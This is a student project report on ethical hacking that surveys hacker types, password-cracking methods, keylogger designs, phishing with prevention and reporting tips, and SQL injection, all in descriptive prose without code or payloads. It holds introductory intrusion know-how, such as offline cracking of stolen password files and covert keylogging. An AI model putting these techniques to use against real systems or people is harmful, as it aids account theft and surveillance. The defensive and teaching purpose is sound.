Ethical Hacking

Submitted To:
Submitted By:

Miss.GURSIMRAT KAUR YOGINDER

GARG(8636)
NISHAN
T MUKHIJA(8613)
SUHI
RD DANIEL(8677)

RIMT – POLYTECHINIC- COLLEGE

 Acknowledgement
First and foremost, we would like to
express our sincere gratitude of our
project guide to MR ANKIT FADIA. We
were privileged to experience a sustained
enthusiastic and involved interest from
his side. This fueled our enthusiasm even
further and encouraged us to boldly step
into what was a totally dark and
unexplored expanse before us.
We would also like to thank our seniors
who were ready with a positive comment
all the time, whether it was an off-hand
comment to encourage us or a
constructive piece of criticism and a
special thank my team member and my
mentors in world of hacking

Last but not least, We would like to thank

the RIMT-POLY staff members and the
institute, in general, for extending a
helping hand at every juncture of need.

RIMT – POLYTECHINIC- COLLEGE

 “HACKING” THE STUDY OF EXPLOITATION
“It's not the daily increase but daily decrease. Hack away at the
unessential”.

WHAT IS THE HACKER ???????????

In common usage, a hacker is a person who breaks into computers, usually by gaining
access to administrative controls.

Other uses of the word hacker exist that are not related to computer security (computer
programmer and home computer hobbyists), but these are rarely used by the mainstream
media. Some would argue that the people that are now

considered hackers are not hackers, as before the media described the person who breaks
into computers as a hacker

there was a hacker community. This community was a community of people who had a large
interest in computer programming, often sharing, without restrictions, the source code for
the software they wrote.

These people now refer to the cyber-criminal hackers as "crackers

The subculture that has evolved around hackers is often referred to as the computer
underground. Proponents

claim to be motivated by artistic and political ends, and are often unconcerned about the
use of illegal means to achieve them.

History
Hacking developed alongside "Phone Phreaking", a term
referred to exploration of the phone network without
authorization, and there has often been overlap between both
technology and participants. Bruce Sterling traces part of the
roots of the computer underground to the Yippee, a 1960s

RIMT – POLYTECHINIC- COLLEGE

counterculture movement which published the Technological
Assistance Program (TAP) newsletter. [3]. Other sources of
early 70s hacker culture can be traced towards more beneficial
forms of hacking, including MIT labs or the homebrew club,
which later resulted in such things as early personal computers
or the open source movement.

Hacker attitudes
Several subgroups of the computer underground with different
attitudes and aims use different terms to demarcate
themselves from each other, or try to exclude some specific
group with which they do not agree. Eric S. Raymond
advocates that members of the computer underground should
be called crackers. Yet, those people see themselves as
hackers and even try to include the views of Raymond in what
they see as one wider hacker culture, a view harshly rejected
by Raymond himself. Instead of a hacker/cracker dichotomy,
they give more emphasis to a spectrum of different categories,
such as white hat (ethical hacking), grey hat, black
hat and script kiddie. In contrast to Raymond, they usually
reserve the term cracker to refer to black hat hackers, or more
generally hackers with unlawful intentions.

Types of hacking:-

 White hat
 Grey hat
 Black hat
 Script kiddie
 Hacktivist

White hat:- A white hat hacker breaks security for non-

malicious reasons, for instance testing their own security
system. This type of hacker enjoys learning and working with
computer systems, and consequently gains a deeper
understanding of the subject. Such people normally go on to

RIMT – POLYTECHINIC- COLLEGE

use their hacking skills in legitimate ways, such as becoming
security consultants. The word 'hacker' originally included
people like this, although a hacker may not be someone into
security.

Grey hat:- A grey hat, in the hacking community, refers to

a skilled hacker who sometimes acts illegally, sometimes in
good will, and sometimes not. They are a hybrid
between white and black hathackers. They usually do not
hack for personal gain or have malicious intentions, but may
or may not occasionally commit crimes during the course of
their technological exploits.

RIMT – POLYTECHINIC- COLLEGE

 Black hat:- A black hat is the villain or bad guy, especially in
a western movie in which such a character would wear a
black hat in contrast to the hero's white hat. The phrase is
often used figuratively, especially in computing slang,
where it refers to a hacker who breaks into networks or
computers, or creates computer viruses.[1]

 Script kiddie:- A script kiddie is a non-expert who breaks

into computer systems by using pre-packaged automated
tools written by others, usually with little understanding.
These are the outcasts of the hacker community.

 Hacktivist:- A hacktivist is a hacker who utilizes technology

to announce a social, ideological, religious, or political
message. In general, most hacktivism involves website
defacement or denial-of-service attacks. In more extreme
cases, hacktivism is used as tool for Cyber terrorism.
Hacktivists are also known as Neo Hackers

Hacktivism (a portman
teau of hack and activism) is "the nonviolent use of illegal or

RIMT – POLYTECHINIC- COLLEGE

legally ambiguous digital tools in pursuit of political ends.
These tools include web site defacements, redirects, denial-
of-service attacks, information theft, web site parodies,
virtual sit-ins, virtual sabotage, and software development."It
is often understood as the writing of code to promote political
ideology - promoting expressive politics, free speech, human
rights, or information ethics. Acts of hacktivism are carried
out in the belief that proper use of code will be able to
produce similar results to those produced by
regular activism or civil disobedience.

Common methods
 Security exploit
 Password cracking
 Packet sniffer
 Spoofing attack
 Root kit
 Cross site scripting (xss)
 Trojan horse
 Virus
 Worm
 Key loggers
 Phishing
 Sql injection

Security exploit
A security exploit is a prepared application that takes
advantage of a known weakness. Common examples of
security exploits are SQL injection, Cross Site
Scripting and Cross Site Request Forgery which abuse security

RIMT – POLYTECHINIC- COLLEGE

holes that may result from substandard programming practice.
Other exploits would be able to be used
through FTP, HTTP, PHP, SSH, Telnet and some web-pages.
These are very common in website/domain hacking.

Password cracking
Password cracking is the process of
recovering passwords from data that has been stored in or
transmitted by a computer system. A common approach is to
repeatedly try guesses for the password.

Packet sniffer
A packet sniffer is an application that captures data packets,
which can be used to capture passwords and other data in
transit over the network.

Spoofing attack
A spoofing attack involves one program, system, or website
successfully masquerading as another by falsifying data and
thereby being treated as a trusted system by a user or another
program. The purpose of this is usually to fool programs,
systems, or users into revealing confidential information, such
as user names and passwords, to the attacker.

Rootkit

RIMT – POLYTECHINIC- COLLEGE

A rootkit is designed to conceal the compromise of a
computer's security, and can represent any of a set of
programs which work to subvert control of an operating
system from its legitimate operators. Usually, a rootkit will
obscure its installation and attempt to prevent its removal
through a subversion of standard system security. Rootkits
may include replacements for system binaries so that it
becomes impossible for the legitimate user to detect the
presence of the intruder on the system by looking at process
tables.

Social engineering
Social Engineering is the art of getting persons to reveal
sensitive information about a system. This is usually done by
impersonating someone or by convincing people to believe you
have permissions to obtain such information.

Trojan horse
A Trojan horse is a program which seems to be doing one
thing, but is actually doing another. A trojan horse can be used
to set up a door in a computer system such that the intruder
can gain access later. (The name refers to the horse from
the Trojan War, with conceptually similar function of deceiving
defenders into bringing an intruder inside.

Virus
A virus is a self-replicating program that spreads by inserting
copies of itself into other executable code or documents.
Therefore, a computer virus behaves in a way similar to
a biological virus, which spreads by inserting itself into living
cells.

RIMT – POLYTECHINIC- COLLEGE

While some are harmless or mere hoaxes most computer virus
are considered malicious.

Worm
Like a virus, a worm is also a self-replicating program. A worm
differs from a virus in that it propagates through computer
networks without user intervention. Unlike a virus, it does not
need to attach itself to an existing program. Many people
conflate the terms "virus" and "worm", using them both to
describe any self-propagating program.

RIMT – POLYTECHINIC- COLLEGE

Key loggers
A keylogger is a tool designed to record ('log') every keystroke
on an affected machine for later retrieval. Its purpose is
usually to allow the user of this tool to gain access to
confidential information typed on the affected machine, such
as a user's password or other private data. Some key loggers
uses virus-, trojan-, and rootkit-like methods to remain active
and hidden. However, some key loggers are used in legitimate
ways and sometimes to even enhance computer security. As an
example, a business might have a key logger on a computer
that was used as at a Point of Sale and data collected by the
key logger could be use for catching employee fraud

Phishing
Phishing is a way of attempting to acquire sensitive
information such as usernames,passwords and credit card
details by masquerading as a trustworthy entity in
anelectronic communication. Communications purporting to be
from popular social web sites, auction sites, online payment

RIMT – POLYTECHINIC- COLLEGE

processors or IT administrators are commonly used to lure the
unsuspecting public. Phishing is typically carried out by e-
mail orinstant messaging, and it often directs users to enter
details at a fake website whose look and feel are almost
identical to the legitimate one. Phishing is an example of social
engineering techniques used to fool users, and exploits the
poor usability of current web security technologies. Attempts
to deal with the growing number of reported phishing
incidents include legislation, user training, public awareness,
and technical security measures.

A phishing technique was described in detail in 1987, and the

first recorded use of the term "phishing" was made in 1996.
The term is a variant of fishing, probably influenced
by phreaking, and alludes to baits used to "catch" financial
information and passwords.

Sql injection
SQL injection is a code injection technique that exploits a security
vulnerability occurring in the database layer of an application. The
vulnerability is present when user input is either incorrectly filtered
for string literal escape characters embedded in SQL statements or
user input is not strongly typed and thereby unexpectedly executed.
It is an instance of a more general class of vulnerabilities that can
occur whenever one programming or scripting language is
embedded inside another. SQL injection attacks are also known as
SQL insertion attacks.

RIMT – POLYTECHINIC- COLLEGE

 PROJECT
REPORT
Password Cracking
SOFTWARE CRACKING
Software cracking is the modification of software to remove
protection methods. This is a type of reverse engineering.
Reverse engineering means study the design, structure and
pattern of process to know how things are work and modify
them for some other use, mainly personal use. The main
reasons for software cracking is:

 For understanding algorithms used in software for use in

there own programs.
 Making shareware software full-version.

RIMT – POLYTECHINIC- COLLEGE

1. PASSWORD CRACKING
Password cracking is a type of software cracking. Since
password form one of the foundation of security for most of
the systems and networks, cracking password is high on the
list of priorities for the attackers trying to break into and
compromise such systems. Password cracking is the process of
recovering secret passwords. Main method of cracking is
guessing. So password cracking is the process of guessing the
password for an application or system until the correct one is
found.

Cracking password can be approached in two ways. They

are: Online Cracking and Offline cracking.
Online Cracking
This approach involves sniffing the network traffic to
capture authentication sessions and try to extract passwords
from the captured information. This is generally slow and
difficult to accomplish, but there are some tools are available
that are specially designed for sniffing out password from
network traffic.
Offline Cracking
This is the preferred method. This involves compromising
a system to gain access to the password file or database and
then running a tool called password cracker to try to guess
valid password for user account. Offline cracking can be
performed on the compromised machine or the password file
can be grabbed and copied to a machine located outside the
compromised network to be cracked at leisure, even some
worms such as Double Tap and Lion can automatically grab
passwords from infected systems.
Principal attack methods used in password
cracking:
There are many methods that are used to crack
passwords. Some of them are given below:
 Weak encryption
 Guessing
 Dictionary Attack
 Brute Force Attack

RIMT – POLYTECHINIC- COLLEGE

  Hybrid Attack
 Precomputation
 Memorization
 Password Grinding
Weak Encryption

Sometimes we use cryptographically weak function to store

password. In most of the computers, before storing the
password into the database it encrypt the password and stores
in some place. Or it may use some hash function for this. If the
system uses some weak function to encrypt password the
cracker needs only a fewer operation to decrypt this.
One example for this is LM hash that Microsoft Windows
uses by default to store user passwords that are less than 15
characters in length. LM hash breaks the password in to two 7-
character fields which are then hashed separately, allowing
each half to be attacked separately.

Guessing

This is the simplest method. Not surprisingly many of the

people use very weak passwords such as blank, the word
'password', 'passcode' and some other words having the
meaning of password, the users name or the login name, the
name some significant relatives of the user, their birth place,
date, pet’s name, passport number etc…… and some users
neglect to change the default password.
Sometimes it is very easy to crack the password if we have a
good idea about the behavior of the user. So by guessing we
can easily crack these passwords.

Dictionary Attack

This type of attack uses some password cracking tools (we will
discuss these later). The tool will be equipped with
a dictionary which contains some commonly used passwords,
name of places, common names, and other commonly used
words. The password cracking tool then encrypt these words

RIMT – POLYTECHINIC- COLLEGE

by using all commonly used encryption methods and then by
using some good searching algorithms check whether a valid
match is found or not.
This is a simple method. And also this is the commonly
used method. It can perform both online and offline cracking.
Brute Force attack
In this method the cracker try all combinations of letters
and digits. This is the simplest and least efficient method. This
is the most time consuming method .This is used when the
dictionary fails. By using the letters, digits and special symbols
it generate every possible length until the correct one is found
or the attacker gives up. The ease with which the password
can be cracked varies with different platforms and systems. OS
much as Microsoft windows server 2003 store the password
securely in encrypted form. To crack such passwords usually
requires at the minimum physical access to the system using
administrative credentials and even then Brute force is usually
the only the approach for extracting password.
User applications such as office productivity tools can
protect document with passwords, and these are generally
easier to crack. Older platforms such as windows 95 stored
password information in '.pwl' files that were weakly encrypted
and easy to crack. In this approach the feasibility is dependent
upon the length of the key, the computational power available
for the process, and the patients of the attacker. This is also
used in both online and offline cracking.

Hybrid Attack

This is the combination of both Dictionary and Brute force

attack. In addition to cracking passwords it is used for
guessing community names on a network that uses simple
network management protocol. In a typical hybrid attack the
cracking program generates short strings of characters and
adds them to the beginning and end of the dictionary words.
Eg: A password such as “daisy 123 “ would likely crack very
quickly through a hybrid attack, which would try the world
“daisy “ with various short strings of characters appended.

RIMT – POLYTECHINIC- COLLEGE

Precomputation

This involves hashing each words in the dictionary and store in

the form of pairs in a way that enables lookup on the cipher
text field. This is very useful only when salt is not properly
used in the program (Salting will be explained later). By
applying time-memory trade-off, a middle ground can be
reached – search space of size N can be turned into an
encrypted database of size O(N 2/3) in which searching for an
encrypted password takes time O(N 2/3).

Memorization

This is a method similar to precomputation. This is used to

crack multiple passwords at cost of cracking just one. Since
encrypting a word takes much longer than comparing it with a
stored word, a lot of effort is saved by encrypting each word
only once and comparing it with each of the encrypted
passwords using an efficient list searching algorithm.

Password grinding

This is manually trying to guess passwords for an application,

system, or network. This is a primitive form of password
cracking in which the attacker simply attempts to log on
repeatedly to the target machine, trying different passwords
until either the correct one is guessed or the system locks out
the attacker. While this might seem like a fruitless activity, it
is amazing how many users employ the word password as their
passwords and how many administrators fail to change or
disable the default passwords included with devices such as
routers they install on their networks. Even considering the
marked exaggeration of hacking abilities depicted in movies
like WarGames and Mission Impossible, a knowledgeable
cracker can occasionally succeed using this simple method and
then leverage the obtained password to further compromise a
target system or network.

RIMT – POLYTECHINIC- COLLEGE

KEYLOGGERS

INTRODUCTION TO KEYLOGGERS
Keystroke logging (often called key logging) is the action of
tracking (or logging) the keys struck on a keyboard, typically
in a covert manner so that the person using the keyboard is
unaware that their actions are being monitored. There are
numerous key logging methods, ranging from hardware and
software-based approaches to electromagnetic and acoustic
analysis.

TYPES OF KEYLOGGERS
Software-based key loggers

A log files from a software-based key logger.

Screen capture of what the software-based key logger above
was logging.
These are software programs designed to work on the target
computer’s operating system. From a technical perspective
there are five categories:
Hypervisor-based: The key logger can theoretically reside in a
malware hypervisor running underneath the operating system,
which remains untouched. It effectively becomes a virtual
machine. Blue Pill is a conceptual example.
Kernel based: This method is difficult both to write and to
combat. Such key loggers reside at the kernel level and are
thus difficult to detect, especially for user-mode applications.
They are frequently implemented as root kits that subvert the
operating system kernel and gain unauthorized access to the
hardware, making them very powerful. A key logger using this
method can act as a keyboard driver for example, and thus
gain access to any information typed on the keyboard as it
goes to the operating system.

RIMT – POLYTECHINIC- COLLEGE

API-based: These keyloggers hook keyboard APIs; the
operating system then notifies the keylogger each time a key
is pressed and the keylogger simply records it. APIs such as
GetAsyncKeyState(), GetForegroundWindow(), etc. are used to
poll the state of the keyboard or to subscribe to keyboard
events.[1] These types of keyloggers are the easiest to write,
but where constant polling of each key is required, they can
cause a noticeable increase in CPU usage, and can also miss
the occasional key. A more recent example simply polls the
BIOS for preboot authentication PINs that have not been
cleared from memory.
Form Grabber based: Form Grabber-based keyloggers log web
form submissions by recording the web browsing onSubmit
event functions. This records form data before it is passed
over the internet and bypasses https encryption.
Packet analyzers: This involves capturing network traffic
associated with HTTP POST events to retrieve unencrypted
passwords.
[edit]Remote access software keyloggers
These are local software keyloggers with an added feature that
allows access to the locally recorded data from a remote
location. Remote communication may be achieved using one of
these methods:
Data is uploaded to a website, database or an FTP server.
Data is periodically emailed to a pre-defined email address.
Data is wirelessly transmitted by means of an attached
hardware system.
The software enables a remote login to the local machine from
the Internet or the local network, for data logs stored on the
target machine to be accessed.
Related features
Software Keyloggers may be augmented with features that
capture user information without relying on keyboard key
presses as the sole input. Some of these features include:
Clipboard logging. Anything that has been copied to the
clipboard can be captured by the program.
Screen logging. Screenshots are taken in order to capture
graphics-based information. Applications with screen logging
abilities may take screenshots of the whole screen, just one
application or even just around the mouse cursor. They may
take these screenshots periodically or in response to user
behaviours (for example, when a user has clicked the mouse).
A practical application used by some keyloggers with this
screen logging ability is to take small screenshots around
where a mouse has just clicked; these defeat web-based

RIMT – POLYTECHINIC- COLLEGE

keyboards (for example, the web-based screen keyboards that
are often used by banks) and any web-based on-screen
keyboard without screenshot protection.
Programmatically capturing the text in a control. The Microsoft
Windows API allows programs to request the text 'value' in
some controls. This means that some passwords may be
captured, even if they are hidden behind password masks
(usually asterisks).
The recording of every program/folder/window opened
including a screenshot of each and every website visited, also
including a screenshot of each.
The recording of search engines queries, Instant Messenger
Conversations, FTP Downloads and other internet based
activities (including the bandwidth used).
In some advanced software keyloggers, sound can be recorded
from a user's microphone and video from a user's webcam.
[citation needed]
Hardware-based keyloggers

A hardware-based keylogger.

A connected hardware-based keylogger.

Main article: Hardware keylogger

Hardware-based keyloggers do not depend upon any software

being installed as they exist at a hardware level in a computer
system.
Firmware-based: BIOS-level firmware that handles keyboard
events can be modified to record these events as they are
processed. Physical and/or root-level access is required to the
machine, and the software loaded into the BIOS needs to be
created for the specific hardware that it will be running on.

Keyboard hardware: Hardware keyloggers are used for

keystroke logging by means of a hardware circuit that is
attached somewhere in between the computer keyboard and
the computer, typically inline with the keyboard's cable
connector. More stealthy implementations can be installed or
built into standard keyboards, so that no device is visible on
the external cable. Both types log all keyboard activity to their
internal memory, which can be subsequently accessed, for
example, by typing in a secret key sequence. A hardware

RIMT – POLYTECHINIC- COLLEGE

keylogger has an advantage over a software solution: it is not
dependent on being installed on the target computer's
operating system and therefore will not interfere with any
program running on the target machine or be detected by any
software. However its physical presence may be detected if,
for example, it is installed outside the case as an inline device
between the computer and the keyboard. Some of these
implementations have the ability to be controlled and
monitored remotely by means of a wireless communication
standard.[citation needed]
Wireless keyboard sniffers

These passive sniffers collect packets of data being

transferred from a wireless keyboard and its receiver. As
encryption may be used to secure the wireless communications
between the two devices, this may need to be cracked
beforehand if the transmissions are to be read.
Keyboard overlays

Criminals have been known to use keyboard overlays on ATMs

to capture people's PINs. Each keypress is registered by the
keyboard of the ATM as well as the criminal's keypad that is
placed over it. The device is designed to look like an integrated
part of the machine so that bank customers are unaware of its
presence.
Acoustic keyloggers

Acoustic cryptanalysis can be used to monitor the sound

created by someone typing on a computer. Each character on
the keyboard makes a subtly different acoustic signature when
stroked. It is then possible to identify which keystroke
signature relates to which keyboard character via statistical
methods such as frequency analysis. The repetition frequency
of similar acoustic keystroke signatures, the timings between
different keyboard strokes and other context information such
as the probable language in which the user is writing are used
in this analysis to map sounds to letters. A fairly long
recording (1000 or more keystrokes) is required so that a big
enough sample is collected.

Electromagnetic emissions
It is possible to capture the electromagnetic emissions of a
wired keyboard from up to 20 metres (66 ft) away, without
being physically wired to it.[7] In 2009, Swiss researches
tested 11 different USB, PS/2 and laptop keyboards in a semi-
Anechoic chamber and found them all vulnerable, primarily

RIMT – POLYTECHINIC- COLLEGE

because of the prohibitive cost of adding shielding during
manufacture.[8] The researchers used a wide-band receiver to
tune into the specific frequency of the emissions radiated from
the keyboards.

Various software based key loggers used are :

1. Ardman key logger

2. Award key logger
3. Ecosoft key logger
4. Perfect key logger
5. Family key logger
6. Spy boss key logger

Various Hardware based key logger:

1. key ghost key logger

2. key devil key logger
3. usb key logger

RIMT – POLYTECHINIC- COLLEGE

 KEY LOGGER USED IN PROJECT FOR
DEMO

PHISHING

What is Phishing ?

RIMT – POLYTECHINIC- COLLEGE

The term phishing is a general term for the creation and use by
criminals of e-mails and websites – designed to look like they
come from well-known, legitimate and trusted businesses,
financial institutions and government agencies – in an attempt
to gather personal, financial and sensitive information. These
criminals deceive Internet users into disclosing their bank and
financial information or other personal data such as usernames
and passwords, or into unwittingly downloading malicious
computer code onto their computers that can allow the
criminals subsequent access to those computers or the users’
financial accounts.ii
Although phishing, identity theft and identity fraud are terms
that are sometimes used interchangeably, some distinctions
are in order. Phishing is best understood as one of a number of
distinct methods that identity thieves use to “steal”
information through deception – that is, by enticing unwitting
consumers to give out their identifying or
financial information either unknowingly or under false
pretenses, or by deceiving them into allowing criminals
unauthorized access to their computers and personal data. The
United States and some other countries use the term “identity
theft,” and the United Kingdom often uses the term “identity
fraud,” to refer broadly to the practice of obtaining and
misusing others’ identifying information for criminal purposes.
Identity fraud also can be used to refer to the subsequent
criminal use of others’ identifying information to obtain goods
or services, or to the use of fictitious identifying information
(not necessarily associated with a real living person) to commit
a crime.
Phishing is committed so that the criminal may obtain
sensitive and valuable information about a consumer, usually
with the goal of fraudulently obtaining access to the
consumer’s bank or other financial accounts. Often “phishers”
will sell credit card or account numbers to other criminals,
turning a very high profit for a relatively small technological
investment.

RIMT – POLYTECHINIC- COLLEGE

How phishing comitted?

In a typical phishing scheme, criminals who want to obtain

personal data from people online first create unauthorized
replicas of (or “spoof”) a real website and e-mail, usually from
a financial institution or another company that deals with
financial information, such as an online merchant. The e-mail
will be created in the style of e-mails by a legitimate company
or agency, using its logos and slogans. The nature and format
of the principal website creation language, Hypertext Markup
Language, make it very easy to copy images or even an entire
website. While this ease of website creation is one of the
reasons that the Internet has grown so rapidly as a
communications medium, it also permits the abuse of
trademarks, tradenames, and other corporate identifiers upon
which consumers have come to rely as mechanisms for
authentication.
Phishers typically then send the "spoofed" e-mails to as many
people as possible in an attempt to lure them in to the scheme.
(In some “spear phishing” attacks (see section on “Spear
Phishing” below), phishers have used other illegal means to
obtain personal information about a group of people, then
targeted that specific group with e-mails that include illegally
obtained information to make the e-mails appear more
plausible.) These e-mails redirect consumers to a spoofed
website, appearing to be from that same business or entity.
The criminals know that while not all recipients will have
accounts or other existing relationships with these companies,
some of them will and therefore are more likely to believe the
e-mail and websites to be legitimate. The concept behind many
phishing attacks is similar to that of "pretext" phone calls (i.e.,
phone calls from persons purporting to be with legitimate
institutions or companies asking the call recipients for
personal information). In fact, the criminals behind these e-
mails, websites, and phone calls have no real connection with
those businesses. Their sole purpose is to obtain the
consumers’ personal data to engage in various fraud
schemes.xv
Phishing schemes typically rely on three elements. First,
phishing solicitations often use familiar corporate trademarks
and tradenames, as well as recognized government agency
names and logos. The use of such trademarks is effective in
many cases because they are familiar to many Internet users
and are more likely to be trusted without closer scrutiny by the
users. Moreover, the indicators that are provided for web

RIMT – POLYTECHINIC- COLLEGE

browsers to assess the validity and security of a website (e.g.,
the lock icon or the address bar) can all be spoofed. This
problem is further compounded by the lack of standardized
protocols among financial institutions for how they will
communicate with their customers and what information they
will request via the Internet.
Second, the solicitations routinely contain warnings intended
to cause the recipients immediate concern or worry about
access to an existing financial account. Phishing scams
typically create a sense of urgency by warning victims that
their failure to comply with instructions will lead to account
terminations, the assessment of penalties or fees, or other
negative outcomes. The fear that such warnings create helps
to further cloud the ability of consumers to judge whether the
messages are authentic. Even if a small percentage of people
who receive these fraudulent warnings respond, the ease with
which such solicitations can be distributed to millions of
people creates a sizable pool of victims. (It should be noted
that some schemes instead are based on offering positive
incentives, for example by offering the promise of a payment
in return for taking part in an online survey.)
Third, the solicitations rely on two facts pertaining to
authentication of the e-mails: (1) online consumers often lack
the tools and technical knowledge to authenticate messages
from financial institutions and e-commerce companies; and (2)
the available tools and techniques are inadequate for robust
authentication or can be spoofed. Criminals can therefore use
techniques, such as forging of e-mail headers and subject
lines, to make the e-mails appear to come from trusted
sources, knowing that many recipients will have no effective
way to verify the true provenance of the e-mails.

Example – Phishing scam targets Royal

Bank Customers

In June 2004, the Royal Bank of Canada notified customers that

fraudulent e-mails purporting to originate from the Royal Bank
were being sent out asking customers to verify account
numbers and personal identification numbers (PINs) through a
link included in the e-mail. The fraudulent e-mail stated that if
the receiver did not click on the link and key in his client card
number and pass code, access to his account would be
blocked. These e-mails were sent within a week of a computer
malfunction that prevented customer accounts from being

RIMT – POLYTECHINIC- COLLEGE

updated. The malfunction impacted payroll deposits that were
scheduled to enter many accounts, leaving customers at risk of
missing mortgage, rent and other payments. The Royal Bank
believes it is likely someone tried to take advantage of the
situation.

The impact of phishing :

Phishing has four distinct types of impact, both domestically

and internationally, that areof concern to the commercial and
financial sectors and to law enforcement in both countries:

• Direct Financial Loss. Depending on the type of fraud that a

criminal commits with the aid of stolen identifying data,
consumers and businesses may lose anywhere from a few
hundred dollars to tens of thousands of dollars. Indeed, small
e-commerce businesses may be particularly hard-hit by
identity fraud. For example, because of credit card association
policies, an online merchant who accepts a credit card number
that later proves to have been acquired by identity theft may
be liable for the full amount of the fraudulent transactions
involving that card number.

• Erosion of Public Trust in the Internet. Phishing also

undermines the public’s trust in the Internet. By making
consumers uncertain about the integrity of commercial and
financial websites, and even the Internet’s addressing system,
phishing can make them less likely to use the Internet for
business transactions. People who cannot trust where they are
on the World Wide Web are less likely to use it for legitimate
commerce and communications.xx
This perspective finds support in a 2005 Consumer Reports
survey, which showed declining confidence in the security of
the Internet. Among several findings, the survey found that 9
out of 10 American adult Internet users have made changes to
their Internet habits because of the threat of identity theft,
and of those, 30 percent say that they reduced their overall
usage. Furthermore, 25 percent say they have stopped
shopping online, while 29 percent of those that still shop
online say they have decreased the frequency of their
purchases.

RIMT – POLYTECHINIC- COLLEGE

• Difficulties in Law Enforcement Investigations. Unlike certain
other types of identity theft that law enforcement agencies
can successfully investigate in a single geographic area (e.g.,
theft of wallets, purses, or mail), phishing – like other types of
crime that exploit the Internet -- can be conducted from any
location where phishers can obtain Internet access. This can
include situations in which a phisher in one country takes
control of a computer in another country, then uses that
computer to host his phishing website or send his phishing e-
mails to residents of still other countries. Moreover, online
criminal activity in recent years has often reflected clearcut
divisions of labor. For example, in an online fraud scheme, the
tasks of writing code, locating hosts for phishing sites,
spamming, and other components of a full-scale phishing
operation may be divided among people in various locations.
This means that in some phishing investigations, timely
cooperation between law enforcement agencies in multiple
countries may be necessary for tracing, identification, and
apprehension of the criminals behind the scheme.

• Incentives for Cross-Border Operations by Criminal

Organizations. Law enforcement authorities in Canada and the
United States are concerned that each of the preceding factors
also creates incentives for members of full-fledged criminal
organizations in various countries to conduct phishing
schemes on a systematic basis. Law enforcement already has
indications that criminal groups in Europe are hiring or
contracting with hackers to produce phishing e-mails and
websites and develop malicious code for use in phishing
attacks.

1. Prevention: What to Do?

• Protect your computer with anti-virus software, spyware
filters, e-mail filters, and firewall programs, and make sure
that they are regularly updated.

RIMT – POLYTECHINIC- COLLEGE

o Consider installing a Web browser tool bar to help protect
you from known phishing fraud websites. (Check with your
browser or e-mail provider for such toolbars.)

• Ensure that your Internet browser is up to date and security

patches applied.
o In particular, people who use the Microsoft Internet Explorer
browser should immediately go to the Microsoft Security home
page—http://www.microsoft.com/security/—to download a
special patch relating to certain phishing schemes.

• Be suspicious of any e-mail with urgent requests for personal

financial information or threats of termination of online
accounts.
o Unless the e-mail is digitally signed, you can't be sure it
wasn't forged or “spoofed.”
o Phishers typically ask for information such as usernames,
passwords, credit card numbers, social security numbers, etc.
o Phisher e-mails are typically not personalized, while valid
messages from your bank or e-commerce company generally
are.

• When contacting your financial institution, use only channels

that you know from independent sources are reliable (e.g.,
information on your bank card, hard-copy correspondence, or
monthly account statement), and don’t rely on links contained
in e-mails, even if the web address appears to be correct.

• Always ensure that you're using a secure website when

submitting credit card or other sensitive information via your
Web browser.
o To make sure you're on a secure Web server, check the
beginning of the Web address in your browsers address bar - it
should be "https://" rather than just http://.

• Regularly log into your online accounts.

o Don't leave them for as long as a month before you check

each account.

• Regularly check your bank, credit and debit card statements

to ensure that all transactions are legitimate.

o If anything is suspicious, contact your bank and all card

issuers.

RIMT – POLYTECHINIC- COLLEGE

• Don't assume that you can correctly identify a website as
legitimate just by looking at its general appearance.
• Don’t use the links in an e-mail to get to any web page, if you
suspect the message might not be authentic.

o Instead, call the company on the telephone, or log onto the

website directly by typing in the Web address in your browser.

• Avoid filling out forms in e-mail messages or pop-up windows

that ask for personal financial information.

o You should only communicate information such as credit card

numbers or account information via a secure website or the
telephone.

Reporting: Suspicious E-mails and

Websites

• Always report a "phishing" or “spoofed” e-mail or website to

the following groups, whether or not you responded to that
phishing e-mail or website:

o Forward the e-mail to reportphishing@antiphishing.com

o Forward the e-mail to the "abuse" e-mail address at the

company that is being spoofed (e.g. "spoof@ebay.com")

o In the United States, forward the e-mail to the Federal Trade

Commission (FTC) at spam@uce.gov and notify the Internet
Crime Complaint Center (IC3) by filing a complaint on its
website, http://www.ifccfbi.gov.

o The IC3 is a joint venture of the FBI and a non-profit

organization, the National White Collar Crime Center (NW3C).
Through the IC3 website, victims of online crime, including
identity theft, can report possible criminal activity. Staff at IC3
analyze these complaints for patterns and levels of possible
criminal conduct and, in appropriate cases, provide
investigative packages of complaint data and other
information to federal, state or local investigators and
prosecutors in various metropolitan areas throughout the U.S.
The IC3 also shares its Internet fraud and identity theft
complaint data with the FTC for inclusion in the FTC’s Identity
Theft Data Clearinghouse.

RIMT – POLYTECHINIC- COLLEGE

RIMT – POLYTECHINIC- COLLEGE
SQL INJECTION
SQL Injection: What is it?
SQL Injection is one of the many web attack mechanisms used
by hackers to steal data from organizations. It is perhaps one
of the most common application layer attack techniques used
today. It is the type of attack that takes advantage of improper
coding of your web applications that allows hacker to inject
SQL commands into say a login form to allow them to gain
access to the data held within your database.

In essence, SQL Injection arises because the fields available for

user input allow SQL statements to pass through and query the
database directly.

SQL Injection: An In-depth Explanation

Web applications allow legitimate website visitors to submit
and retrieve data to/from a database over the Internet using
their preferred web browser. Databases are central to modern
websites – they store data needed for websites to deliver
specific content to visitors and render information to
customers, suppliers, employees and a host of stakeholders.
User credentials, financial and payment information, company
statistics may all be resident within a database and accessed
by legitimate users through off-the-shelf and custom web
applications. Web applications and databases allow you to
regularly run your business.

SQL Injection is the hacking technique which attempts to pass

SQL commands (statements) through a web application for
execution by the backend database. If not sanitized properly,
web applications may result in SQL Injection attacks that allow
hackers to view information from the database and/or even
wipe it out.

Such features as login pages, support and product request

forms, feedback forms, search pages, shopping carts and the
general delivery of dynamic content, shape modern websites
and provide businesses with the means necessary to
communicate with prospects and customers. These website
features are all examples of web applications which may be
either purchased off-the-shelf or developed as bespoke
programs.

RIMT – POLYTECHINIC- COLLEGE

These website features are all susceptible to SQL Injection
attacks which arise because the fields available for user input
allow SQL statements to pass through and query the database
directly.

SQL Injection: A Simple Example

Take a simple login page where a legitimate user would enter

his username and password combination to enter a secure area
to view his personal details or upload his comments in a forum.

When the legitimate user submits his details, an SQL query is

generated from these details and submitted to the database
for verification. If valid, the user is allowed access. In other
words, the web application that controls the login page will
communicate with the database through a series of planned
commands so as to verify the username and password
combination. On verification, the legitimate user is granted
appropriate access.

Through SQL Injection, the hacker may input specifically

crafted SQL commands with the intent of bypassing the login
form barrier and seeing what lies behind it. This is only
possible if the inputs are not properly sanitised (i.e., made
invulnerable) and sent directly with the SQL query to the
database. SQL Injection vulnerabilities provide the means for a
hacker to communicate directly to the database.

